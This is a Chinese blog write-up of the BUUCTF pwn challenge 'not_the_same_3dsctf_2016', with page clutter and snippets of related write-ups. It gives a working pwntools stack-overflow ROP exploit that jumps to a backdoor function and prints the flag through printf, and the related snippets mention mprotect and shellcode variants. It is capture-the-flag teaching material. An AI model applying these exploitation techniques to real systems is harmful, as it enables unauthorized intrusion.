BUUCTF Pwn ot_the_same_3dsctf_2016 题解

最新推荐文章于 2025-02-20 12:52:02 发布

艾莉莉阿文

最新推荐文章于 2025-02-20 12:52:02 发布

阅读量241

点赞数 1

分类专栏： BUUCTF Pwn 文章标签：网络安全

本文链接：https://blog.youkuaiyun.com/qq_33348179/article/details/144391323

版权

BUUCTF 同时被 2 个专栏收录

71 篇文章

订阅专栏

Pwn

57 篇文章

订阅专栏

1.下载得到文件 checksec:

32位开启了NX保护

拖入IDA32看代码

找到主函数

发现函数里面还有个后门函数

将flag存储在f14g上

但是flag只是存储到了变量上需要打印出来

所以需要获取printf函数的地址

又因为printf打印出来的条件要有个exit 所以还需要它的地址

构造exp：

from pwn import *

p = remote("node5.buuoj.cn", 26022)

backdoor = 0x080489A0
printf = 0x804F0A0
exit = 0x0804E660
flag = 0x080ECA2D


payload = b'a' * (0x2D) + p32(backdoor) + p32(printf) + p32(exit) + p32(flag)
p.sendline(payload)
p.interactive()

运行得到flag：

EX:pwndbg

栈上看到了自己的payload

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

艾莉莉阿文

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

buuctf——not_the_same_3dsctf_2016

qq_41560595的博客

03-26

555

这道题和前面分析过的get_started_3dsctf_2016差不多，换汤不换药。选择一个地址0x080EB000，用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。解题代码： from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m

【BUUCTF - PWN】not_the_same_3dsctf_2016

古月浪子的博客

03-27

1618

checksec一下，可以栈溢出 IDA打开看看，直接可以溢出有一个后门函数，会把flag放在bss段上程序有write函数，通过rop把flag打印出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sl=la...

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF-not_the_same_3dsctf_2016

Fzuim的博客

03-03

1793

这是一道pwn题目IDA查看伪代码查看编译属性思路1，本地可打通，远程不行思路2，正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击通过查看字符串列表，发现有个get_secret读取flag.txt后门函数查看编译属性思路1，本地可打通，远程不行也是最简单的，payload构造溢出返回到get_secret函数，并printf打印出fl4g，payload如下 #coding=utf8 from pwn import * context.log_level = 'deb

【not_the_same_3dsctf_2016】

2301_81060697的博客

02-20

279

from pwn import* from LibcSearcher import LibcSearcher r=remote("node5.buuoj.cn",27164) elf=ELF(r"C:\Users\lezho\Desktop\misc\not_the_same_3dsctf_2016") printf=elf.symbols["printf"] print(hex(puts_plt)) get_flag=0x080489A0 fla

BUUCTF-PWN-not_the_same_3dsctf_2016

Henlenl的博客

05-19

240

文章目录查看文件信息IDA静态分析exp 查看文件信息开了个NX保护 IDA静态分析开始看上去其实就是利用gets()来溢出的我们可以 shift+f12 查看字符串可以看到 flag.txt 这个字符串我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag，然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址，打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读

[BUUCTF-pwn]——not_the_same_3dsctf_2016

Y_peak的博客

02-10

1052

not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序在IDA中，发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感字符串找到调用的函数get_secret函数函数调用后,flag储存在fl4g里面,我们找到fl4g的位置找到可以输出的write函数下面我们就可

BUUCTF PWN get_started_3dsctf_2016

Rt1Text的博客

04-23

411

1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编该题没有用ebp寻址,用的是esp寻址也就是说不需要覆盖ebp四字节这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...

buuctf|get_started_3dsctf_2016 1

m0_64236521的博客

05-01

728

方法一我将文件下载后将其重命名为pwn_13，checksec一下可以直接栈溢出，32位，进入ida gets(v4)可以栈溢出，这里没找到后门函数，只发现了get_flag函数，进去看看只要a1,a2满足值便可以输出flag，a1和a2是函数参数，我们可以进行传入，同时为了让get_flag正常结束，我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

1106

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

get_started_3dsctf_2016|get_started_3dsctf_2016

12-11

网络安全逆向PWN题目，简单的栈溢出，虽然有后门函数，但同时又给了一定的限制条件，可以使用更复杂的ROP解法。该样本题解：https://blog.youkuaiyun.com/A951860555/article/details/111030289

【BUUCTFPWN】not_the_same_3dsctf_2016

m0_55368674的博客

01-12

551

【BUUCTF - PWN】not_the_same_3dsctf_2016题解

[BUUCTF]PWN14——not_the_same_3dsctf_2016

mcmuyanga的博客

08-29

2251

[BUUCTF]PWN14——not_the_same_3dsctf_2016 题目网址：https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤：例行检查，32位，开启了nx保护 nc一下看看程序大概的执行情况，没看出个所以然 32位ida载入，shift+f12查看程序里的字符串，发现flag.txt 双击跟进，ctrl+x找到调用这个字符串的函数，可以看到，这个函数将flag读了出来，存放到了unk_80F91B的位置，我们要想办法将这个地

[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup

Csome

05-21

602

解题 checksec 先checksec一下，发现没有开canary方便了栈溢出，PIE也没开反编译 IDA反编译 main函数 get_secret函数分析利用程序先进入main函数，有一个gets（无限长度的栈溢出） get_secret函数是将flag.txt读入bss段中，并没有做输出的操作思路：，在main函数中修改main函数的返回地址，返回到get_secret函数中，读取flag，再返回到mian函数中（第二次进入main函数），修改返回地址为printf的地址，传入flag

[BUUCTF]-PWN：not_the_same_3dsctf_2016解析

2301_79326813的博客

12-03

643

答：这里跟exit没有太大关系，不是exit也行，但printf和flag_addr的隔一个是printf函数在32位的调用规则，也就是通过栈传参，64位与32位不同，64位是前6个参数通过寄存器传参，因此payload的书写也不同，这个需要注意。答：printf从缓冲区打印出东西需要满足条件，比如有换行符或缓冲区已满或程序退出，如果不满足条件flag无法被打印出来。答：因为这里没有rbp，在main函数的汇编界面就可以看到程序并没有把rbp推入，所以不用覆盖rbp。问题1：为什么填充45个字符？

BUUCTF not_the_same_3dsctf_2016

、moddemod

06-11

842

还是静态链接的，一个文件，自己玩，所以打开IDA找找能用到的函数就可以了，题目也非常简单，栈溢出 from pwn import * context(log_level='debug', arch='i386') proc_name = './not_the_same_3dsctf_2016' p = process(proc_name) elf = ELF(proc_name) bss_start_addr = elf.bss() & ~(elf.bss() % 0x1000) mprot.

buuctf|pwn-not_the_same_3dsctf_2016-wp

l2645470582_的博客

11-08

353

1.检查保护机制我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串，我们看到有‘flag.txt’关键字符我们就查找出后门函数的地址：0x080489A0 我们看到读取flag.txt,注意fgets函数，就是在f14g里面读取45个字符，我们猜测这就是flag 3.我们查看main函数里面有什么我们看到gets(&v4)有个溢出，我们看到v4地址是0x2D 4.rop ...

buuctf之 not_the_same

qq_42728977的博客

02-19

671

题目：not_the_same_3dsctf_2016 环境：ubuntu14 漏洞点：栈溢出、mprotect、shellcode 思路：使用mprotect更改内存权限，通过栈溢出更改程序流程，读入shellcode并执行参考链接： get_started_3dsctf_2016-Pwn get_started_3dsctf_2016-Pwn 上来就这，感觉这个题很简单啊。再看看函数列表...

buuctf pwn others_shellcode